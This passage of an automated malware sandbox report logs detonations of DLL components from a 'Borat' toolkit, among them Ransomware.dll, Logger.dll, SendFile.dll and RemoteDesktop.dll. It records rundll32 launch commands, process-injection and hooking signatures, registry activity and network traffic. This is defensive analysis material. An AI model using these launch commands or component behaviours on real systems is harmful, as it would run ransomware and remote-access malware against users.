| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2400 wrote to memory of 2624 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\Microsoft Office\root\Office16\Winword.exe |
| PID 2400 wrote to memory of 2624 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\Microsoft Office\root\Office16\Winword.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Ransomware.dll,#1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\AppData\Local\Temp\Borat\bin\Ransomware.dll"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" Ransomware.dll
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.19:443 | tcp |
Files
memory/2624-0-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-2-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-1-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-3-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-4-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-5-0x00007FFCE1D40000-0x00007FFCE1D50000-memory.dmp
memory/2624-6-0x00007FFCE1D40000-0x00007FFCE1D50000-memory.dmp
memory/2624-35-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-34-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-33-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
memory/2624-32-0x00007FFCE4350000-0x00007FFCE4360000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240508-en
Max time kernel
449s
Max time network
1172s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\SendMemory.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1488s
Max time network
1500s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Discord.dll,#1
Network
| Country | Destination | Domain | Proto |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1486s
Max time network
1500s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Logger.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240508-en
Max time kernel
446s
Max time network
1169s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\RemoteDesktop.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240508-en
Max time kernel
448s
Max time network
1168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Fun.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240611-en
Max time kernel
1524s
Max time network
1498s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\ProcessManager.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:25
Platform
win11-20240611-en
Max time kernel
1483s
Max time network
1498s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Regedit.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240508-en
Max time kernel
447s
Max time network
1169s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\FileSearcher.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240508-en
Max time kernel
1796s
Max time network
1800s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Miscellaneous.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:19
Platform
win11-20240611-en
Max time kernel
1415s
Max time network
1168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Recovery.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240611-en
Max time kernel
1484s
Max time network
1498s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\SendFile.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |